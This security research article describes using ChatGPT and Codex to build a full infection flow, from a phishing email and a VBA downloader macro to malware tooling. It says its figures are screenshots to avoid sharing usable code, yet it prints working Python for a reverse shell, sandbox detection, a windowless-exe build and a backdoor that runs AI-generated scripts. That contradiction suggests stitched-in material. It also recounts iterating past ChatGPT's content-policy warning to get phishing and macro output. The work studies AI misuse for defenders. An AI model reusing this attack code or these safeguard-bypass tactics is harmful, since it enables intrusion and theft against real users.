OpwnAI: AI That Can Save the Day or HACK it Away
Research by: Sharon Ben-Moshe, Gil Gekker, Golan Cohen
Introduction
The release of ChatGPT, OpenAI's new interface for its Large Language Model (LLM), has sparked an explosion of interest in general AI in the media and on social networks over the last few weeks. The model is used in many applications across the web and has been praised for its ability to generate well-written code and aid the development process. However, this new technology also brings risks. For instance, lowering the bar for code generation can help less-skilled threat actors effortlessly launch cyber-attacks.
In this article, Check Point Research demonstrates:
How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell
How researchers created an additional backdoor that dynamically runs scripts that the AI generates on the fly
Examples of the positive impact of OpenAI on the defenders' side and how it can help researchers in their day-to-day work
The world of cybersecurity is rapidly changing. It is critical to remain vigilant about how this new and developing technology can affect the threat landscape, for both good and bad. While this new technology helps defenders, it also lowers the barrier to entry for low-skilled threat actors to run phishing campaigns and develop malware.
Background
From image generation to writing code, AI models have made tremendous progress in multiple fields: the famous AlphaGo software beat the top professionals at the game of Go in 2016, and improved speech recognition and machine translation brought the world virtual assistants such as Siri and Alexa that play a major role in our daily lives.

Recently, public interest in AI spiked due to the release of ChatGPT, a prototype chatbot whose "purpose is to assist with a wide range of tasks and answer questions to the best of my ability." Unless you've been disconnected from social media for the last few weeks, you've most likely seen countless screenshots of ChatGPT interactions, from writing poetry to answering programming questions.

However, like any technology, ChatGPT's increased popularity also carries increased risk. For example, Twitter is replete with examples of malicious code or dialogues generated by ChatGPT. Although OpenAI has invested tremendous effort into stopping abuse of its AI, it can still be used to produce dangerous code.

To illustrate this point, we decided to use ChatGPT alongside another OpenAI platform, Codex, an AI-based system that translates natural language to code, most capable in Python but proficient in other languages. We created a full infection flow and gave ourselves one restriction: we did not write a single line of code and instead let the AIs do all the work. We only put together the pieces of the puzzle and executed the resulting attack. We chose to illustrate our point with a single execution flow: a phishing email carrying a malicious Excel file weaponized with macros that download a reverse shell (a favorite among cybercrime actors).
ChatGPT: The Talented Phisher
As a first step, we created a plausible phishing email. This cannot be done by Codex, which can only generate code, so we asked ChatGPT for help and suggested it impersonate a hosting company.
Figure 1 – Basic phishing email generated by ChatGPT
Note that while OpenAI warns that this content might violate its content policy, its output provides a great start. In further interaction with ChatGPT, we can clarify our requirements: to avoid hosting additional phishing infrastructure, we want the target to simply download an Excel document. Asking ChatGPT to iterate again produces an excellent phishing email:
Figure 2 – Phishing email generated by ChatGPT
Iteration is essential when working with the model, especially for code. The next step, creating the malicious VBA code in the Excel document, also requires multiple iterations.
This is the first prompt:
Figure 3 – Simple VBA code generated by ChatGPT
This code is very naive and uses libraries such as WinHttpReq. However, after some short iteration and back-and-forth chatting, ChatGPT produces better code:
Figure 4 – Another version of the VBA code
This is still a very basic macro, but we decided to stop here, as obfuscating and refining VBA code can be a never-ending procedure. ChatGPT proved that, given good textual prompts, it can produce working malicious code.
Codex – An AI, or the Future Name of an Implant?
Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is translating natural language to code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code.
We first asked it to create a basic reverse shell for us, using a placeholder IP and port. The prompt is the comment at the beginning of the code block.
Figure 5 – Basic reverse shell generated by Codex
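The figures in this article are screenshots rather than shared source, to avoid publishing usable malicious code. For readers following along, a minimal sketch of what such a Codex-generated reverse shell typically looks like (placeholder host and port, as in our prompt) is:

```python
import socket
import subprocess

def reverse_shell(host: str, port: int) -> None:
    """Connect back to host:port, execute received commands, and return their output.
    Stops on an empty command or an explicit "exit"."""
    with socket.create_connection((host, port)) as s:
        while True:
            cmd = s.recv(4096).decode().strip()
            if not cmd or cmd == "exit":
                break
            # Run the command in a shell and send back both stdout and stderr.
            result = subprocess.run(cmd, shell=True, capture_output=True)
            s.sendall(result.stdout + result.stderr)
```

For obvious reasons, run something like this only against a listener you control on your own machine.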
This is a great start, but it would be nice if there were some malicious tools we could use to help us with our intrusion. Perhaps some scanning tools, such as checking if a service is open to SQL injection and port scanning?
Figure 6 – The most basic implementation of SQLi testing generated by Codex
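The generated SQLi check in Figure 6 boils down to injecting a single quote into a parameter and looking for database error messages in the response. A sketch of that idea (the error signatures and the `fetch` callable are illustrative, not Codex's exact output):

```python
# Common database error fragments that often leak when a stray quote breaks a query.
SQL_ERROR_SIGNATURES = [
    "you have an error in your sql syntax",   # MySQL
    "unclosed quotation mark",                # MSSQL
    "sqlite3.operationalerror",               # SQLite
    "pg::syntaxerror",                        # PostgreSQL
]

def looks_like_sql_error(body: str) -> bool:
    """Return True if a response body contains a typical SQL error message."""
    lowered = body.lower()
    return any(sig in lowered for sig in SQL_ERROR_SIGNATURES)

def probe_param(fetch, url: str) -> bool:
    """Naive SQLi probe: append a single quote and check for a DB error.
    `fetch` is any callable mapping a URL to response text (e.g. built on requests)."""
    return looks_like_sql_error(fetch(url + "'"))
```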
Figure 7 – Basic port scanning script
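The port scanner in Figure 7 is similarly simple; an equivalent sketch using only the standard library might be:

```python
import socket

def scan_ports(host: str, ports) -> list:
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)
            # connect_ex returns 0 on success instead of raising an exception.
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```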
This is also a good start, but we would like to add some mitigations to make the defenders' lives a little more difficult. Can we detect if our program is running in a sandbox? The basic answer provided by Codex is below; of course, it can be improved by adding other vendors and additional checks.
Figure 8 – Basic sandbox detection script
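Sandbox checks of the kind Codex produced usually look for virtualization artifacts on disk. The driver paths below are common VirtualBox/VMware locations and are illustrative only; a real sample would check many more artifacts (MAC prefixes, registry keys, uptime, and so on):

```python
import os

# File artifacts commonly present in analysis VMs (illustrative list).
SANDBOX_ARTIFACTS = [
    r"C:\Windows\System32\drivers\VBoxGuest.sys",   # VirtualBox guest driver
    r"C:\Windows\System32\drivers\vmhgfs.sys",      # VMware shared-folders driver
    r"C:\Windows\System32\vboxdisp.dll",            # VirtualBox display driver
]

def likely_sandboxed(artifacts=SANDBOX_ARTIFACTS) -> bool:
    """Return True if any known virtualization artifact exists on disk."""
    return any(os.path.exists(path) for path in artifacts)
```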
We are making progress. However, all of this is standalone Python code. Even if an AI bundles this code together for us (which it can), we can't be sure the infected machine will have an interpreter. To make it run natively on any Windows machine, the easiest solution is to compile the Python to an exe. Once again, our AI buddies come through for us:
Figure 9 – Conversion from Python to exe
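The article does not name the tool in Figure 9. One common way to do this conversion is PyInstaller (our assumption, not necessarily what the AI suggested), which can be driven from Python itself:

```python
import subprocess
import sys

def pyinstaller_cmd(script: str) -> list:
    """Build the PyInstaller command line for a single-file, windowless exe."""
    return [sys.executable, "-m", "PyInstaller",
            "--onefile",      # bundle everything into one executable
            "--noconsole",    # no console window on launch (Windows)
            script]

def build_exe(script: str) -> None:
    """Bundle a script into a standalone executable.
    Assumes PyInstaller is installed (pip install pyinstaller)."""
    subprocess.run(pyinstaller_cmd(script), check=True)
```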
And just like that, the infection flow is complete. We created a phishing email with an attached Excel document containing malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs; all that's left for us to do is execute the attack.
No Knowledge of Scripting? Don't Worry, English Is Good Enough
We were curious to see how deep the rabbit hole goes. Creating the initial scripts and modules is nice, but a real cyberattack requires flexibility, as the attackers' needs during an intrusion might change rapidly depending on the infected environment. To see how we can leverage the AI's ability to generate code on the fly to answer this dynamic need, we created the following short Python program. Compiled to a PE, the exe first runs the previously mentioned reverse shell. Afterwards, it waits for commands with the -cmd flag and runs Python scripts generated on the fly by querying the Codex API with a simple prompt in English.
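Our PoC's exact source is not shared; structurally, though, the generate-and-execute loop can be sketched as follows, with `generate_code` standing in for the Codex API call (a hypothetical callable mapping a prompt to Python source):

```python
import argparse

def build_prompt(task: str) -> str:
    """Wrap an English task description in a minimal code-generation prompt,
    mirroring how we prompted Codex with a leading comment."""
    return f"# Python 3\n# {task}\n"

def run_generated(task: str, generate_code, namespace=None) -> dict:
    """Ask a code-generation backend for a script and execute it.
    `generate_code` stands in for the remote API call; the generated source
    runs directly, as in the article's PoC. Returns the resulting namespace."""
    source = generate_code(build_prompt(task))
    namespace = namespace if namespace is not None else {}
    exec(source, namespace)
    return namespace

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-cmd", help="English description of the script to generate")
    # args = parser.parse_args()  # wiring to a real API key/endpoint omitted
```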
Below are a few examples of the script's execution; we leave the possible vectors for developing this kind of attack to the curious reader:
Figure 10 – Execution of code generated on the fly based on input in English
Using Codex to Augment Defenders
Up to this point, we have presented the threat actor's perspective on using LLMs. To be clear, the technology itself isn't malevolent and can be used by any party. As attack processes can be automated, so can mitigations on the defenders' side.
To illustrate this, we asked Codex to write two simple Python functions: one that helps search for URLs inside files using the YARA package, and another that queries VirusTotal for the number of detections of a specific hash. Even though there are better existing open-source implementations of these scripts written by the defender community, we hope to spark the imagination of blue teamers and threat hunters to use the new LLMs to automate and improve their work.
Figure 11 – VT API query to check the number of detections for a hash
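Figure 11's helper is a straightforward VirusTotal lookup. A sketch of the same idea (the endpoint and x-apikey header follow VirusTotal's public v3 API; the parsing helper is ours, not Codex's exact output):

```python
import json
import urllib.request

VT_FILE_REPORT = "https://www.virustotal.com/api/v3/files/{}"

def fetch_report(sha256: str, api_key: str) -> dict:
    """Fetch a file report from the VirusTotal v3 API (requires an API key)."""
    req = urllib.request.Request(VT_FILE_REPORT.format(sha256),
                                 headers={"x-apikey": api_key})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def count_detections(report: dict) -> int:
    """Count engines flagging a file, given a v3 file report's analysis stats."""
    stats = report["data"]["attributes"]["last_analysis_stats"]
    return stats.get("malicious", 0) + stats.get("suspicious", 0)
```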
Figure 12 – YARA script that checks for URL strings in a file
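Figure 12 uses the YARA package; since yara-python may not be installed everywhere, the same idea can be sketched with a plain regex over the file's raw bytes (a deliberate simplification of the YARA approach):

```python
import re

# Match http/https URLs in raw bytes; a rough pattern for illustration only.
URL_PATTERN = re.compile(rb"https?://[\w./%-]+")

def find_urls(path: str) -> list:
    """Return decoded URL strings found anywhere in a file's raw bytes."""
    with open(path, "rb") as fh:
        return [match.decode() for match in URL_PATTERN.findall(fh.read())]
```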
Conclusion
The expanding role of LLMs and AI in the cyber world is full of opportunity, but it also comes with risks. Although the code and infection flow presented in this article can be defended against with simple procedures, this is just an elementary showcase of the impact of AI research on cybersecurity. Multiple scripts can be generated easily, with slight variations produced by different wordings. Complicated attack processes can also be automated, using LLM APIs to generate other malicious artifacts. Defenders and threat hunters should be vigilant and quick to adopt this technology; otherwise, our community will be one step behind the attackers.